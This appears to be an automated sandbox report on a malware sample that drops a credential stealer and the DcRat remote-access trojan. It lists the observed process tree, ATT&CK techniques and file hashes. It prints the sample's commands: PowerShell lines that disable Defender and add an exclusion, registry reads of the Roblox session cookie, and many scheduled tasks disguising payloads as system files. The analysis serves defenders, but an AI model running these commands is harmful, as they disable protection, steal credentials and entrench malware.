C:\Users\Admin\AppData\Local\Temp\stealqqgwrffs.exe"C:\Users\Admin\AppData\Local\Temp\stealqqgwrffs.exe"2⤵
- Drops file in Drivers directory
- Executes dropped EXE
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of WriteProcessMemory
PID:2424 -
C:\Windows\System32\Wbem\wmic.exe"wmic.exe" csproduct get uuid3⤵
- Suspicious use of AdjustPrivilegeToken
PID:2356
-
-
C:\Windows\system32\attrib.exe"attrib.exe" +h +s "C:\Users\Admin\AppData\Local\Temp\stealqqgwrffs.exe"3⤵
- Views/modifies file attributes
PID:2720
-
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"powershell.exe" Add-MpPreference -ExclusionPath 'C:\Users\Admin\AppData\Local\Temp\stealqqgwrffs.exe'3⤵
- Command and Scripting Interpreter: PowerShell
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:2648
-
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"powershell.exe" Set-MpPreference -DisableIntrusionPreventionSystem $true -DisableIOAVProtection $true -DisableRealtimeMonitoring $true -DisableScriptScanning $true -EnableControlledFolderAccess Disabled -EnableNetworkProtection AuditMode -Force -MAPSReporting Disabled -SubmitSamplesConsent NeverSend && powershell Set-MpPreference -SubmitSamplesConsent 23⤵
- Command and Scripting Interpreter: PowerShell
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:2976
-
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"powershell.exe" Get-ItemPropertyValue -Path HKCU:SOFTWARE\Roblox\RobloxStudioBrowser\roblox.com -Name .ROBLOSECURITY3⤵
- Command and Scripting Interpreter: PowerShell
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:2092
-
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"powershell.exe" Get-ItemPropertyValue -Path HKLN:SOFTWARE\Roblox\RobloxStudioBrowser\roblox.com -Name .ROBLOSECURITY3⤵
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:1788
-
-
C:\Windows\System32\Wbem\wmic.exe"wmic.exe" os get Caption3⤵
- Suspicious use of AdjustPrivilegeToken
PID:2604
-
-
C:\Windows\System32\Wbem\wmic.exe"wmic.exe" computersystem get totalphysicalmemory3⤵PID:1520
-
-
C:\Windows\System32\Wbem\wmic.exe"wmic.exe" csproduct get uuid3⤵PID:3012
-
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"powershell.exe" Get-ItemPropertyValue -Path 'HKLM:System\CurrentControlSet\Control\Session Manager\Environment' -Name PROCESSOR_IDENTIFIER3⤵
- Command and Scripting Interpreter: PowerShell
- Suspicious behavior: EnumeratesProcesses
PID:2276
-
-
C:\Windows\System32\Wbem\wmic.exe"wmic" path win32_VideoController get name3⤵
- Detects videocard installed
PID:1784
-
-
C:\Windows\system32\cmd.exe"cmd.exe" /c ping localhost && del /F /A h "C:\Users\Admin\AppData\Local\Temp\stealqqgwrffs.exe" && pause3⤵
- System Network Configuration Discovery: Internet Connection Discovery
PID:1328 -
C:\Windows\system32\PING.EXEping localhost4⤵
- System Network Configuration Discovery: Internet Connection Discovery
- Runs ping.exe
PID:2356
-
-
-
-
C:\Users\Admin\AppData\Local\Temp\ratgergedrghi.exe"C:\Users\Admin\AppData\Local\Temp\ratgergedrghi.exe"2⤵
- DcRat
- Executes dropped EXE
- System Location Discovery: System Language Discovery
- Suspicious use of WriteProcessMemory
PID:2156 -
C:\Windows\SysWOW64\WScript.exe"C:\Windows\System32\WScript.exe" "C:\providerWinsessionruntimehost\Xt9KI1krEJFJGvttvIkhdsOgzo3.vbe"3⤵
- System Location Discovery: System Language Discovery
- Suspicious use of WriteProcessMemory
PID:3012 -
C:\Windows\SysWOW64\cmd.execmd /c ""C:\providerWinsessionruntimehost\g3CEdDrA4txDO2RaU.bat" "4⤵
- Loads dropped DLL
- System Location Discovery: System Language Discovery
- Suspicious use of WriteProcessMemory
PID:1108 -
C:\providerWinsessionruntimehost\Surrogatereviewsession.exe"C:\providerWinsessionruntimehost\Surrogatereviewsession.exe"5⤵
- Modifies WinLogon for persistence
- UAC bypass
- Executes dropped EXE
- Adds Run key to start application
- Checks whether UAC is enabled
- Drops file in System32 directory
- Drops file in Program Files directory
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of WriteProcessMemory
- System policy modification
PID:2936 -
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /C "C:\Users\Admin\AppData\Local\Temp\zpX8udRTfq.bat"6⤵
- Suspicious use of WriteProcessMemory
PID:2868 -
C:\Windows\system32\w32tm.exew32tm /stripchart /computer:localhost /period:5 /dataonly /samples:27⤵PID:2684
-
-
C:\providerWinsessionruntimehost\conhost.exe"C:\providerWinsessionruntimehost\conhost.exe"7⤵
- UAC bypass
- Executes dropped EXE
- Checks whether UAC is enabled
- Suspicious behavior: EnumeratesProcesses
- Suspicious behavior: GetForegroundWindowSpam
- System policy modification
PID:2004
-
-
-
-
C:\Windows\SysWOW64\reg.exereg add HKCU\Software\Microsoft\Windows\CurrentVersion\Policies\System /v DisableTaskMgr /t REG_DWORD /d 1 /f5⤵
- System Location Discovery: System Language Discovery
- Modifies registry key
PID:2156
-
-
-
-
-
C:\Windows\system32\schtasks.exeschtasks.exe /create /tn "conhostc" /sc MINUTE /mo 11 /tr "'C:\providerWinsessionruntimehost\conhost.exe'" /f1⤵
- DcRat
- Process spawned unexpected child process
- Scheduled Task/Job: Scheduled Task
PID:1760
-
C:\Windows\system32\schtasks.exeschtasks.exe /create /tn "conhost" /sc ONLOGON /tr "'C:\providerWinsessionruntimehost\conhost.exe'" /rl HIGHEST /f1⤵
- DcRat
- Process spawned unexpected child process
- Scheduled Task/Job: Scheduled Task
PID:2572
-
C:\Windows\system32\schtasks.exeschtasks.exe /create /tn "conhostc" /sc MINUTE /mo 5 /tr "'C:\providerWinsessionruntimehost\conhost.exe'" /rl HIGHEST /f1⤵
- DcRat
- Process spawned unexpected child process
- Scheduled Task/Job: Scheduled Task
PID:2180
-
C:\Windows\system32\schtasks.exeschtasks.exe /create /tn "stealqqgwrffss" /sc MINUTE /mo 5 /tr "'C:\Windows\SysWOW64\lt-LT\stealqqgwrffs.exe'" /f1⤵
- DcRat
- Process spawned unexpected child process
- Scheduled Task/Job: Scheduled Task
PID:1856
-
C:\Windows\system32\schtasks.exeschtasks.exe /create /tn "stealqqgwrffs" /sc ONLOGON /tr "'C:\Windows\SysWOW64\lt-LT\stealqqgwrffs.exe'" /rl HIGHEST /f1⤵
- DcRat
- Process spawned unexpected child process
- Scheduled Task/Job: Scheduled Task
PID:608
-
C:\Windows\system32\schtasks.exeschtasks.exe /create /tn "stealqqgwrffss" /sc MINUTE /mo 10 /tr "'C:\Windows\SysWOW64\lt-LT\stealqqgwrffs.exe'" /rl HIGHEST /f1⤵
- DcRat
- Process spawned unexpected child process
- Scheduled Task/Job: Scheduled Task
PID:3024
-
C:\Windows\system32\schtasks.exeschtasks.exe /create /tn "stealqqgwrffss" /sc MINUTE /mo 8 /tr "'C:\Program Files (x86)\Reference Assemblies\Microsoft\Framework\stealqqgwrffs.exe'" /f1⤵
- DcRat
- Process spawned unexpected child process
- Scheduled Task/Job: Scheduled Task
PID:2032
-
C:\Windows\system32\schtasks.exeschtasks.exe /create /tn "stealqqgwrffs" /sc ONLOGON /tr "'C:\Program Files (x86)\Reference Assemblies\Microsoft\Framework\stealqqgwrffs.exe'" /rl HIGHEST /f1⤵
- DcRat
- Process spawned unexpected child process
- Scheduled Task/Job: Scheduled Task
PID:1396
-
C:\Windows\system32\schtasks.exeschtasks.exe /create /tn "stealqqgwrffss" /sc MINUTE /mo 14 /tr "'C:\Program Files (x86)\Reference Assemblies\Microsoft\Framework\stealqqgwrffs.exe'" /rl HIGHEST /f1⤵
- DcRat
- Process spawned unexpected child process
- Scheduled Task/Job: Scheduled Task
PID:992
-
C:\Windows\system32\schtasks.exeschtasks.exe /create /tn "smsss" /sc MINUTE /mo 12 /tr "'C:\providerWinsessionruntimehost\smss.exe'" /f1⤵
- DcRat
- Process spawned unexpected child process
- Scheduled Task/Job: Scheduled Task
PID:1368
-
C:\Windows\system32\schtasks.exeschtasks.exe /create /tn "smss" /sc ONLOGON /tr "'C:\providerWinsessionruntimehost\smss.exe'" /rl HIGHEST /f1⤵
- DcRat
- Process spawned unexpected child process
- Scheduled Task/Job: Scheduled Task
PID:2496
-
C:\Windows\system32\schtasks.exeschtasks.exe /create /tn "smsss" /sc MINUTE /mo 6 /tr "'C:\providerWinsessionruntimehost\smss.exe'" /rl HIGHEST /f1⤵
- DcRat
- Process spawned unexpected child process
- Scheduled Task/Job: Scheduled Task
PID:908
-
C:\Windows\system32\schtasks.exeschtasks.exe /create /tn "csrssc" /sc MINUTE /mo 6 /tr "'C:\providerWinsessionruntimehost\csrss.exe'" /f1⤵
- DcRat
- Process spawned unexpected child process
- Scheduled Task/Job: Scheduled Task
PID:2196
-
C:\Windows\system32\schtasks.exeschtasks.exe /create /tn "csrss" /sc ONLOGON /tr "'C:\providerWinsessionruntimehost\csrss.exe'" /rl HIGHEST /f1⤵
- DcRat
- Process spawned unexpected child process
- Scheduled Task/Job: Scheduled Task
PID:1744
-
C:\Windows\system32\schtasks.exeschtasks.exe /create /tn "csrssc" /sc MINUTE /mo 7 /tr "'C:\providerWinsessionruntimehost\csrss.exe'" /rl HIGHEST /f1⤵
- DcRat
- Process spawned unexpected child process
- Scheduled Task/Job: Scheduled Task
PID:1620
-
C:\Windows\system32\schtasks.exeschtasks.exe /create /tn "servicess" /sc MINUTE /mo 10 /tr "'C:\Recovery\8cdd6da2-3d81-11ef-9400-f2a3cf4ad94f\services.exe'" /f1⤵
- DcRat
- Process spawned unexpected child process
- Scheduled Task/Job: Scheduled Task
PID:1540
-
C:\Windows\system32\schtasks.exeschtasks.exe /create /tn "services" /sc ONLOGON /tr "'C:\Recovery\8cdd6da2-3d81-11ef-9400-f2a3cf4ad94f\services.exe'" /rl HIGHEST /f1⤵
- DcRat
- Process spawned unexpected child process
- Scheduled Task/Job: Scheduled Task
PID:1604
-
C:\Windows\system32\schtasks.exeschtasks.exe /create /tn "servicess" /sc MINUTE /mo 5 /tr "'C:\Recovery\8cdd6da2-3d81-11ef-9400-f2a3cf4ad94f\services.exe'" /rl HIGHEST /f1⤵
- DcRat
- Process spawned unexpected child process
- Scheduled Task/Job: Scheduled Task
PID:1504
-
C:\Windows\system32\schtasks.exeschtasks.exe /create /tn "conhostc" /sc MINUTE /mo 13 /tr "'C:\MSOCache\All Users\{90140000-0018-0409-0000-0000000FF1CE}-C\conhost.exe'" /f1⤵
- DcRat
- Process spawned unexpected child process
- Scheduled Task/Job: Scheduled Task
PID:2480
-
C:\Windows\system32\schtasks.exeschtasks.exe /create /tn "conhost" /sc ONLOGON /tr "'C:\MSOCache\All Users\{90140000-0018-0409-0000-0000000FF1CE}-C\conhost.exe'" /rl HIGHEST /f1⤵
- DcRat
- Process spawned unexpected child process
- Scheduled Task/Job: Scheduled Task
PID:1796
-
C:\Windows\system32\schtasks.exeschtasks.exe /create /tn "conhostc" /sc MINUTE /mo 14 /tr "'C:\MSOCache\All Users\{90140000-0018-0409-0000-0000000FF1CE}-C\conhost.exe'" /rl HIGHEST /f1⤵
- DcRat
- Process spawned unexpected child process
- Scheduled Task/Job: Scheduled Task
PID:1596
-
C:\Windows\system32\schtasks.exeschtasks.exe /create /tn "explorere" /sc MINUTE /mo 11 /tr "'C:\Program Files\Common Files\explorer.exe'" /f1⤵
- DcRat
- Process spawned unexpected child process
- Scheduled Task/Job: Scheduled Task
PID:2300
-
C:\Windows\system32\schtasks.exeschtasks.exe /create /tn "explorer" /sc ONLOGON /tr "'C:\Program Files\Common Files\explorer.exe'" /rl HIGHEST /f1⤵
- DcRat
- Process spawned unexpected child process
- Scheduled Task/Job: Scheduled Task
PID:2528
-
C:\Windows\system32\schtasks.exeschtasks.exe /create /tn "explorere" /sc MINUTE /mo 5 /tr "'C:\Program Files\Common Files\explorer.exe'" /rl HIGHEST /f1⤵
- DcRat
- Process spawned unexpected child process
- Scheduled Task/Job: Scheduled Task
PID:2988
-
C:\Windows\system32\schtasks.exeschtasks.exe /create /tn "lsassl" /sc MINUTE /mo 8 /tr "'C:\Program Files (x86)\Reference Assemblies\Microsoft\lsass.exe'" /f1⤵
- DcRat
- Process spawned unexpected child process
- Scheduled Task/Job: Scheduled Task
PID:2556
-
C:\Windows\system32\schtasks.exeschtasks.exe /create /tn "lsass" /sc ONLOGON /tr "'C:\Program Files (x86)\Reference Assemblies\Microsoft\lsass.exe'" /rl HIGHEST /f1⤵
- DcRat
- Process spawned unexpected child process
- Scheduled Task/Job: Scheduled Task
PID:2688
-
C:\Windows\system32\schtasks.exeschtasks.exe /create /tn "lsassl" /sc MINUTE /mo 8 /tr "'C:\Program Files (x86)\Reference Assemblies\Microsoft\lsass.exe'" /rl HIGHEST /f1⤵
- DcRat
- Process spawned unexpected child process
- Scheduled Task/Job: Scheduled Task
PID:796
Network
MITRE ATT&CK Enterprise v15
Execution
Command and Scripting Interpreter
1PowerShell
1Scheduled Task/Job
1Scheduled Task
1Persistence
Boot or Logon Autostart Execution
2Registry Run Keys / Startup Folder
1Winlogon Helper DLL
1Scheduled Task/Job
1Scheduled Task
1Privilege Escalation
Abuse Elevation Control Mechanism
1Bypass User Account Control
1Boot or Logon Autostart Execution
2Registry Run Keys / Startup Folder
1Winlogon Helper DLL
1Scheduled Task/Job
1Scheduled Task
1Defense Evasion
Abuse Elevation Control Mechanism
1Bypass User Account Control
1Hide Artifacts
1Hidden Files and Directories
1Impair Defenses
1Disable or Modify Tools
1Modify Registry
5Credential Access
Credentials from Password Stores
1Credentials from Web Browsers
1Unsecured Credentials
1Credentials In Files
1Replay Monitor
Loading Replay Monitor...
Downloads
-
Filesize
1.5MB
MD5260fd8b292d7acf337beab707e84604c
SHA11133c94c57883f8c5624837d51fb88ef220fab06
SHA2566d7b8c65737968c2ba34d5c64bf2427a49b7b4c74b3d558cf64814c97ba88cfb
SHA512f83a804b7ac3918bbe76cea264f7451f5682da26b71cfa67e4e66a3281bc6c1ea478db02d16c80b01f7191e157e644fb966c56c9035e800c42d9f3539fa682b1
-
Filesize
230KB
MD596ee12b0a9e8e1f0b0f85da1b482fdcb
SHA128711afb99a8397ebf5a6cb629e3e20465c0fdfa
SHA256253b05b6848e8a312b0a622d62d370d6dedf59f24fb52fca803234977880649b
SHA512f9f0012cc0eec4fe176338cc17ea8f870660ea5db8a33cc5000348e3bcdf4067ef7192dc3ecb3b7a5ff271d97085ba1c66eb5e170d24faf3daaee2b504c1e411
-
Filesize
209B
MD5e231a421a5b52335695a0988584b24c8
SHA1c870b193b18494e75175df24af5df13c8dfce138
SHA256c0eaff70769d0e8a84222fd6e18c7816ebfb77d408f546900d71f1c9ca270672
SHA5124c77499efaf9339433bb174b57e3225b07cb66a78bb72cbb84282b512ec0147bef252a8824c5d95e87d00a9115edaeb7100c8b8a9310e206164bd989477b2f5f
-
C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Recent\CustomDestinations\590aee7bdd69b59b.customDestinations-ms
Filesize7KB
MD5ebab82d611a9d441e4aece2410466e68
SHA1a9f3716cbc37ced5a0c5c5ad09233a46f86fd579
SHA256301a2627dbd3ebc36b6ff38712ce01ca5297b9ba9da5ae5e69823663768369f6
SHA512fba691b91b2c823ca1a6ddc191008a6fb2312a8bc025150ffe6a07bf987747890195837ffd83c0d39e448e2744ab6daf4220ec65e87c1cf745e3fe4727da05a9
-
Filesize
223B
MD588ef9c38e649b66c4641665e74fce531
SHA11603bd91a66807a8c7095d0cbc64c9d3679e6780
SHA25665455609bf7611ec4bd6f9fbc08a0835612e15562665349f67ae92b0287243c6
SHA512a3cd4848553acc3a685b10adf3b801f5ec78e9e706c7e0d6f89425dd7c64f4809dfa5001ee7aec60abeb8e23043608a351bc9ca52b687f6082f4880158465f16
-
Filesize
173B
MD52c8e46086b87c611b970c172dcb48bc1
SHA1c489d490655a5af55c7a9b33cf69a460093fc1ec
SHA256c8aaa713c91dfae8607a468ce53adb457685e5b89127ea6a36625058fadc00ab
SHA512e7e23ae1690897518083cf5a5d2a53ef6c9e9ce8d520deff8d69b091305c0cfcd2a84ebf6ecccc5ef81f9de97b8a70796d243ee7b002b6cd63966bc1f4602377
-
Filesize
1.2MB
MD56227db1487700389df5e1bd5c29e16b6
SHA168795a61f653f7b63fa5e2ebbbe1bc97aed3242f
SHA256359ede2f634418bc23101b414c0b35139c1dbacd9a6b5ff152f0733c4a9bd3d0
SHA5122668b4a6d18b3ee6b2961b7eea6c1de669ec8df9b679f2a5fb3041d9f469eba92b4bd1467ea7b8ec7fc1e914a6d6cb008dbbe67bf67cc41b05d1f1979b56eead